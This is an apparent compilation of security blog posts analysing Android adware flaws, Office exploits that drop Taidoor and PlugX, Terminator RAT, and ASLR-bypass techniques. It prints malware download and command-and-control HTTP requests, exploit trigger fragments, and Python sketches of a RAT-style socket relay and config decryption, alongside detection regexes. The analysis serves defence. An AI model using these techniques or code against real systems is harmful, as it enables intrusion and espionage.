The figure below illustrates the change over time of the status of vulnerable apps affected by AppLovin on Google Play. In particular, we collect and depict the statistics of apps that we have observed on Google Play with at least 100k downloads and with at least one version containing the vulnerable versions of AppLovin starting September 20. Over time, a vulnerable app may be removed by Google Play (which we call “removed apps”, represented in gray), have a new version available on Google Play that addresses the security issues either by removing AppLovin entirely or by upgrading the embedded AppLovin to 5.1 or above (which we call “upgradable apps”, represented in green), or remain vulnerable (which we call “vulnerable apps”, represented in red), as shown in the legend in the chart.

Please note that we started collecting the data of app removal from Google Play on October 20, 2013. Thus, any relevant app removal between September 20 and October 20 will be counted and shown on October 20. Also, for each app included in the chart, Google Play shows a range of its number of downloads, e.g., between 1M and 5M. We use the lower end of the range in our download count so the statistics we show are conservative estimates.


We are glad to see that over time, many vulnerable apps have been either removed from Google Play or have more secure versions available on Google Play. However, apps with hundreds of millions of downloads in total still remain vulnerable. In addition, note that while removing vulnaggressive apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable since they are not automatically removed from the devices. Furthermore, because many users do not update their downloaded apps often and older versions of Android do not auto-update apps, even after the new, more secure version of a vulnerable app is available on Google Play, millions of users of these apps will remain vulnerable until they update to the new versions of these apps on their devices. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

Exploit Proliferation: Additional Threat Groups Acquire CVE-2013-3906

Last week, we blogged about a zero-day vulnerability (CVE-2013-3906) that was being used by at least two different threat groups. Although it was the same exploit, the two groups deployed it differently and dropped very different payloads. One group, known as Hangover, engages in targeted attacks, usually against targets in Pakistan. The second group, known as Arx, used the exploit to spread the Citadel Trojan, and we have found that they are also using the Napolar (aka Solar) malware. [1]

Looking at the time of the first known use of the exploit, we noted that the Arx group appeared to have had access to this exploit prior to the Hangover group. Subsequent research by Kaspersky has found that this exploit was used in July 2013 to spread a cross-platform malware known as Janicab. Interestingly, the Janicab samples have exactly the same CreateDate and ModifyDate as the Arx samples. However, the ZipModifyDate is different. They also contain the same embedded TIFF file (aa6d23cd23b98be964c992a1b048df6f).

While the Janicab activity dates the use of CVE-2013-3906 to July, other groups, including those associated with advanced persistent threat (APT) activity, have now begun to use this exploit as well. We have found that CVE-2013-3906 is now being used to drop Taidoor and PlugX (which we call Backdoor.APT.Kaba). Interestingly, the version of the exploit used contains elements that are consistent with the Hangover implementation. Both the Taidoor and PlugX samples have EXIF data that is consistent with a Hangover sample. In addition, the samples share the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1).


The Taidoor malware has been used in numerous targeted attacks that typically affect Taiwan-related entities. We recently blogged about modifications that have been made to the Taidoor malware. This new version of Taidoor is being dropped by malicious documents using the CVE-2013-3906 exploit. The malware is being distributed via an email purporting to be from a Taiwanese government email address.


The Taidoor sample we analyzed (6003b22d22af86026afe62c39316b9e0) has the same CreateDate and ModifyDate as the Hangover samples we analyzed. It also shares an exact ZipModifyDate with one of the Hangover samples. (There are variations in the ZipModifyDate among the Hangover samples).

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

It also contains other EXIF data that matches a Hangover sample (and the PlugX sample discussed below):

  • App Version                     : 12.0000
  • Creator                            : Win7
  • Last Modified By              : Win7
  • Revision Number             : 1

The sample also contains the same embedded TIFF file (7dd89c99ed7cec0ebc4afa8cd010f1f1). This indicates that they were probably built with the same weaponizer tool.
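The clustering logic implied above (matching CreateDate/ModifyDate and embedded TIFF hash suggesting a shared weaponizer) can be sketched in a few lines of Python. The field names follow the EXIF data quoted in this post; `tiff_md5` is a label of our choosing:

```python
from collections import defaultdict

def cluster_by_weaponizer(samples):
    """Group samples whose document metadata matches exactly: the same
    CreateDate/ModifyDate and embedded TIFF hash imply the same builder,
    following the reasoning in this post."""
    clusters = defaultdict(list)
    for md5, meta in samples.items():
        key = (meta.get("CreateDate"), meta.get("ModifyDate"), meta.get("tiff_md5"))
        clusters[key].append(md5)
    return {k: sorted(v) for k, v in clusters.items()}
```

Run against the samples discussed here, the Taidoor and PlugX documents would fall into one bucket and the July Janicab documents into another.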

After the exploit is triggered, a connection is made to retrieve an EXE from a web server:

GET /o.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)

Connection: Keep-Alive

This EXE is Taidoor and it is configured to beacon to two command and control (CnC) servers: and

GET /user.jsp?ij=oumded191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Connection: Keep-Alive
Cache-Control: no-cache

GET /parse.jsp?js=iwmnxw191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Connection: Keep-Alive
Cache-Control: no-cache

We have located an additional sample (5c8d7d4dd6cc8e3b0bd6587221c52102) that also retrieves Taidoor:

GET /suv/update.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)

Connection: Keep-Alive

This sample beacons to the command and control server: (

GET /parse.jsp?ne=vyhavf191138F9744C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Connection: Keep-Alive
Cache-Control: no-cache
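The three Taidoor beacons shown in this post share an apparent structure: a two-letter parameter, six lowercase letters, and what looks like a 12-character uppercase-hex host identifier. A Python regex capturing that reading might look like the following; note that it is inferred from only three samples and is not a vetted detection signature:

```python
import re

# Two-letter parameter, six lowercase letters, then a 12-character
# uppercase-hex ID -- a reading of just three captures, not a signature.
TAIDOOR_BEACON = re.compile(r"/(?:user|parse)\.jsp\?[a-z]{2}=[a-z]{6}[0-9A-F]{12}$")

def looks_like_taidoor_beacon(uri):
    """Flag request URIs that match the beacon shape seen in this post."""
    return bool(TAIDOOR_BEACON.search(uri))
```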

PlugX (Kaba)

The PlugX malware (aka Backdoor.APT.Kaba) has been used in a variety of targeted attacks. We located a malicious document (80c8ce1fd7622391cac892be4dbec56b) that exploits CVE-2013-3906. This sample contains the same CreateDate and ModifyDate and shares a common ZipModifyDate with both the Taidoor samples and one of the Hangover samples.

  • CreateDate                : 2013:10:03 22:46:00Z
  • ModifyDate                : 2013:10:03 23:17:00Z
  • ZipModifyDate           : 2013:10:17 14:21:23

After exploitation, there is a connection to ( that downloads a PlugX executable:

GET /css/css.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)


The malware (423eaeff2a4576365343e6dc35d22042) begins to beacon to and, which both resolve to The callback of the PlugX samples is:

POST /8A8DAEE657205D651405D7CD HTTP/1.1
Accept: */*
FZLK1: 0
FZLK2: 0
FZLK3: 61456
FZLK4: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache


An increasing number of threat groups now have access to CVE-2013-3906. These threat groups include those that use the Taidoor and PlugX malware families to conduct targeted attacks. We expect this exploit to continue to proliferate among threat groups engaged in APT activity.


1.  The MD5 hashes for Arx group samples that dropped Napolar are:  5e4b83fd11050075a2d4913e6d81e553  and f6c788916cf6fafa202494658e0fe4ae. The CnC server was: /

Evasive Tactics: Terminator RAT

FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

  • It evades sandboxes by terminating and removing itself (DW20.exe) after installation; the malicious behavior appears only after a reboot.
  • It deters single-object-based sandboxes by segregating roles between collaborating components: the RAT (svchost_.exe) works with its relay (sss.exe) to communicate with the command and control server.
  • It deters forensic investigation by changing the startup location.
  • It deters file-based scanners that implement a maximum file-size filter by expanding the size of svchost_.exe to 40MB.

The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety (of possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

These modifications appear to be an attempt to evade network defenses, perhaps in response to defenders’ increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

Figure 1


1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)


DW20.exe is the installation executable. It first creates its working folders, “%UserProfile%\Microsoft” and “%AppData%\2019”. The former stores the configurations and executable files (svchost_.exe and sss.exe); the latter stores the shortcut link files. The “2019” folder is then configured as the new startup folder location by changing the registry value “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup" to its path (see Figure 2).

Figure 2

The executable file “sss.exe” is the decrypted form of the resource named 140 with type “ACCELORATOR” (a likely misspelling of “Accelerator”; see Figure 3). The resource is decrypted using a customized XTEA algorithm and appended with an encrypted configuration of domains and ports.

Figure 3

After installation, DW20.exe deletes and terminates itself; the malware components run only after a reboot. This is an effective way to evade automated sandbox analysis, as the malicious activity is revealed only after the system restarts.


2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)


sss.exe is an interesting malware component: analyzed independently, it would not be considered malicious. It acts as a network relay between the malware and the proxy server, listening on port 8000. To achieve this, it first identifies the proxy servers configured on the system using “WinHttpGetIEProxyConfigForCurrentUser”, and stores the discovered proxy servers and their ports in a file named “PROXY” in the same directory (see Figure 4).

Figure 4

When a new TCP connection arrives on port 8000, it attempts to create a local-to-proxy socket connection and checks connectivity with the CnC server. If the response code is 200, it creates a “relay link” between the malware and the CnC server (see Figure 5). The relay link consists of two threads: one transfers data from socket 1 to socket 2 (see Figure 6), and the other does the reverse.

Figure 5


Figure 6
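The two-thread "relay link" pattern described above is a standard construction. The following is a minimal Python sketch of the same idea, not a reconstruction of sss.exe itself:

```python
import socket
import threading

def pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF (one direction)."""
    while True:
        try:
            data = src.recv(4096)
        except OSError:
            break
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)  # propagate EOF to the far side
    except OSError:
        pass

def relay(sock_a, sock_b):
    """Create the relay link: one thread per direction, as in Figures 5 and 6."""
    threads = (threading.Thread(target=pump, args=(sock_a, sock_b), daemon=True),
               threading.Thread(target=pump, args=(sock_b, sock_a), daemon=True))
    for t in threads:
        t.start()
    return threads
```

In sss.exe the second socket would be the connection to the discovered proxy; here both ends are plain sockets for clarity.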

As depicted in Figure 7, the user agent is hard-coded. This offers a possible means of identifying malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE” is not a valid version token.


Figure 7
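A crude heuristic based on the observation above would flag any traffic claiming an IE 6 user agent. The exact hard-coded string is not reproduced in this post, so the pattern below matches any MSIE 6.x token; treat it as an assumption, not a signature:

```python
import re

# The post's observation: an IE 6 User-Agent is a red flag in modern traffic.
# The actual hard-coded string is not reproduced here, so match any MSIE 6.x.
IE6_UA = re.compile(r"\bMSIE 6\.\d")

def suspicious_user_agent(ua):
    """Return True for User-Agent headers claiming Internet Explorer 6."""
    return bool(IE6_UA.search(ua))
```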


The configuration for the malicious domains and ports is located in the last 188 bytes of the executable file (see Figure 8). The first 16 bytes are the key (boxed in red) used to decrypt the remaining content with a modified XTEA algorithm (see Figure 9). The two malicious domains found were “” and “”

Figure 8

Figure 9
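For readers who want to experiment with the configuration layout described above (a 16-byte key followed by encrypted data in the file's last 188 bytes), here is a sketch using textbook XTEA. The post notes that Terminator's variant is a modified XTEA whose exact changes are not published, so this is a starting point rather than a decryptor for the real sample; the little-endian word layout is also an assumption:

```python
import struct

DELTA, MASK = 0x9E3779B9, 0xFFFFFFFF

def xtea_encrypt_block(block, key, rounds=32):
    """Textbook XTEA encryption of one 8-byte block (for round-trip checks)."""
    v0, v1 = struct.unpack("<2I", block)
    k = struct.unpack("<4I", key)
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
    return struct.pack("<2I", v0, v1)

def xtea_decrypt_block(block, key, rounds=32):
    """Textbook XTEA decryption; the real sample uses a *modified* variant."""
    v0, v1 = struct.unpack("<2I", block)
    k = struct.unpack("<4I", key)
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
    return struct.pack("<2I", v0, v1)

def read_config_tail(blob):
    """Split the last 188 bytes: a 16-byte key, then the encrypted config."""
    tail = blob[-188:]
    return tail[:16], tail[16:]
```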


3.   Network Traffic


The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), was not configured with the fake HTML, Yahoo! Messenger, or Windows Messenger traffic headers seen in past variants. However, the content is encrypted in exactly the same way as in previous versions of Terminator RAT.

Figure 10

The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

Figure 11

This particular sample is configured to one of two command and control servers:



  • /
  • /

We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

Figure 12

The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

  •  /

The command and control servers for both samples resolved to IP addresses in the same class C network.


4.   Campaign Connections


In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

Figure 13

The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158); however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server, but the callback is quite different:

XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$
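If the bracketed fields in the callback format above are placeholders for real values, a parser can be sketched as follows. The substitution format is inferred from the published string, not confirmed against live traffic:

```python
import re

# Assumes the bracketed placeholders in the published format string are
# replaced in-line by the real IP, computer name, and MAC address.
WINDATA_RE = re.compile(
    r"^XYZ /WinData\.DLL\?HELO-STX-1\*1(?P<ip>[\d.]+)\*(?P<host>[^*]+)"
    r"\*0605\[MAC:(?P<mac>[0-9A-Fa-f:-]+)\]\$")

def parse_windata_beacon(line):
    """Extract ip/host/mac from a WinData-style beacon, or None on no match."""
    m = WINDATA_RE.match(line)
    return m.groupdict() if m else None
```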

In a separate case where has been used as the command and control server, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.




Terminator RAT is an example of how malware is becoming increasingly sophisticated and harder to detect. Continual research is needed to understand the various techniques, tactics, and procedures used by adversaries. Detecting exploitation and identifying anomalous callbacks are becoming critical to preventing malware from installing on a system or phoning home to its command and control servers.


Update: Ad Vulna Continues

This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

Since our last notification to Google and Ad Vulna (code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the included ad library to the newest version, which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often, and older versions of Android do not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest versions.

From our current analysis, there are still many other apps on Google Play using the vulnaggressive versions of the Ad Vulna ad library, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention, which is uniquely capable of protecting its customers from such threats.

We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL: JRE 1.6.x ships with an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped with MS Office 2007/2010, is not compiled with ASLR. This technique was first described here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

The following zero-day exploits used at least one of these non-ASLR modules to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.


The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.
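Whether a module opts into ASLR is recorded in the DllCharacteristics field of its PE optional header: the /DYNAMICBASE flag corresponds to the bit 0x0040 (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE). A minimal Python sketch of the check, with invented flag values:

```python
# IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: set when a module was linked with
# /DYNAMICBASE and can therefore be relocated (ASLR-compatible).
DYNAMICBASE = 0x0040

def supports_aslr(dll_characteristics: int) -> bool:
    """Return True if the PE's DllCharacteristics field opts into ASLR."""
    return bool(dll_characteristics & DYNAMICBASE)

# Example flag values (invented for illustration):
print(supports_aslr(0x0140))  # True  -- a module built with /DYNAMICBASE
print(supports_aslr(0x0000))  # False -- e.g. MSVCR71.DLL, loaded at a fixed base
```

In practice the field would be read from the PE optional header of the DLL on disk; the hardcoded values here stand in for that parsing step.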

Modify the BSTR length/null terminator

This technique first appeared in Peter Vreugdenhil’s IE 8 exploit at Pwn2Own 2010. It applies only to specific types of vulnerabilities that can overwrite memory, such as a buffer overflow, an arbitrary memory write, or increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.
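The info-leak primitive can be sketched abstractly. The toy Python model below (all addresses and values are invented for illustration) shows how corrupting a BSTR’s length field turns a bounds-checked string read into an out-of-bounds read that discloses a neighboring object’s pointer:

```python
import struct

# Toy model of a heap region: a BSTR (4-byte length prefix + data) followed
# immediately by an object whose first field is a fake "vtable pointer".
heap = bytearray()
data = b"AAAA"
heap += struct.pack("<I", len(data)) + data   # the BSTR
heap += struct.pack("<I", 0x6B0A1000)         # neighbor's pointer (invented)

def bstr_read(mem, start, offset):
    """Bounds-checked byte read that trusts the (corruptible) length field."""
    length = struct.unpack_from("<I", mem, start)[0]
    if offset >= length:
        raise IndexError("out of bounds")
    return mem[start + 4 + offset]

# In-bounds reads work as expected...
assert bstr_read(heap, 0, 0) == ord("A")

# ...then the memory-write bug corrupts the length field:
struct.pack_into("<I", heap, 0, 0x1000)

# Now the same "checked" accessor leaks the neighboring object's pointer,
# which can be used to locate a module base for ROP.
leaked = bytes(bstr_read(heap, 0, len(data) + i) for i in range(4))
print(hex(struct.unpack("<I", leaked)[0]))  # 0x6b0a1000
```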

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.


The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up on Immunity’s blog.


This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The Array object length modification is similar to the BSTR length modification: both require a certain class of “user-friendly” vulnerabilities. Even better, from the attacker’s point of view, is that once the length changes, the attacker can also arbitrarily read from or write to memory, essentially taking control of the whole process flow and achieving code execution.

Here is the list of known zero-day exploits using this technique:


This exploit involves a buffer overflow in Adobe Flash Player’s regular-expression handling. The attacker overwrites the length of a Vector.<Number> object, then reads more memory content to get the base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a continuous memory layout by allocating the following objects:
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.


This vulnerability involves an IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:
  2. After the spray, those objects are stored aligned at a stable memory address. For example:

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the highlighted values correspond to the values in the spray code above.

  3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object’s length to 0x3FFFFFF0.
  5. From there, the attacker can access the whole memory space of the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attributes and bypass DEP as follows:

By crafting the memory layout, the attacker also allocates a Vector.<object> containing a flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to locate the Sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.
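Numerically, the size-inflating OR described above works like this (a Python sketch using the 0x03f0 length from the analysis; the memory model is simplified to a single dword):

```python
import struct

# Simulate the corrupted heap slot: a Vector.<uint> whose first dword holds
# its length, 0x03f0, as described in the analysis above.
mem = bytearray(struct.pack("<I", 0x03F0))

# The use-after-free effectively executes:  or dword ptr [esi+8], 20000h
val = struct.unpack_from("<I", mem, 0)[0]
struct.pack_into("<I", mem, 0, val | 0x20000)

new_len = struct.unpack_from("<I", mem, 0)[0]
print(hex(new_len))  # 0x203f0 -- far past the vector's real allocation
```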


The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:


In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following:


In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.


After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can locate this ArrayBuffer by comparing byteLength values in JavaScript, and can then read from or write to memory through the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300) and manually hardcoded the offsets to construct the ROP payload.
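A rough sketch of how the single 16-bit write of 0x0001 can turn the byteLength 0xff004 into 0x010ff004, assuming the write is aimed at the top byte of the little-endian 32-bit length field (the exact aiming offset is our assumption, not stated in the original analysis):

```python
import struct

# Model the ArrayBuffer header: its 32-bit byteLength (0xff004, as above)
# followed by a few don't-care bytes. Little-endian, as on x86.
mem = bytearray(struct.pack("<I", 0x000FF004) + b"\x00" * 4)

# The bug writes the 16-bit word 0x0001 to an attacker-chosen address.
# Aiming it at byte offset 3 flips the top byte of the length; the word's
# trailing 0x00 lands harmlessly on the next byte.
struct.pack_into("<H", mem, 3, 0x0001)

new_len = struct.unpack_from("<I", mem, 0)[0]
print(hex(new_len))  # 0x10ff004
```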


This vulnerability involves a Java CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it out to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than the other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all: as long as the attacker has a memory-write vulnerability, it is easily implemented.


The following table outlines recent APT zero-day exploits and what bypass techniques they used:



ASLR bypasses have become more and more common in zero-day attacks. We have seen previous IE zero-day exploits use non-ASLR Microsoft Office DLLs to bypass ASLR, and Microsoft has added mitigations to its latest OS and browser to prevent non-ASLR modules from defeating ASLR. Because the old technique no longer works and is easily detected, cybercriminals will have to use more advanced exploitation techniques. For vulnerabilities that allow writing memory, combining Vector.<uint> and Vector.<object> is more reliable and flexible: with just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy, and it works on the latest OS and browser regardless of the application or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggressive libraries are proprietary, and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about these security issues, and they are actively addressing them.

Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

